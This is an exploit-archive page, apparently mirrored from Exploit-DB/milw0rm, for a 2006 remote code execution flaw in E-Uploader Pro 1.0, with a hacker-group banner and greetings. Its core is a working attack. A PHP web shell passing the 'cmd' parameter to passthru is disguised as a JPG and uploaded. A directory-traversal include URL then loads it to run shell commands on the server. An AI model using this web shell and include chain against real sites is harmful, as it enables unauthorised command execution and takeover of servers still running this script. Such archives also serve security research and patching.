E-Uploader Pro - exploit.company

vendor:

E-Uploader Pro

by:

Kacper (a.k.a Rahim)

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: E-Uploader Pro

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

E-Uploader Pro <= 1.0 Remote Code Execution Vulnerabilities

The E-Uploader Pro 1.0 script is vulnerable to remote code execution. An attacker can exploit this vulnerability to execute arbitrary code on the target system.

Mitigation:

Update to a patched version of the E-Uploader Pro script or disable the affected functionality.

Source

Exploit-DB raw data:

:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
	
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- E-Uploader Pro <= 1.0 Remote Code Execution Vulnerabilities
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: E-Uploader Pro 1.0
- [Script site: http://www.scriptsfrenzy.com/euploader.html
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
-          Contact: kacper1964@yahoo.pl
-                        or
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
-      SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios, SpiderZ
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

devilteam.jpg source: <?php ob_clean();echo"Hacker_Kacper_Made_in_Poland:)";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>

Name:*: devilteam
Email:* devilteam@hackers.pl
File:* upload evil devilteam.jpg ;]

Click: Upload

then....

[devilteam.jpg] uploaded


Your upload has been successful!


....

	Uploader Name
	devilteam639
	
Now insert:

http://strona.pl/uploader/include/config.php?language=../../root/devilteam639/devilteam.jpg?cmd=ls -la

echo Hacker_Kacper_Made_in_Poland:)

E-Uploader Pro Game Over ;]

DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

# milw0rm.com [2006-10-14]